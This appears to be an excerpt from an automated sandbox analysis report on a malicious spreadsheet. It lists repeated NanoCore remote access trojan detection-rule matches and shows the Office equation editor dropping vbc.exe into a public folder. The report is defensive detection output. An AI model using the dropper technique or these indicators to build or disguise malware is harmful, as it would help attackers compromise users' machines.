        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00406925
        Source: Original title deed.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
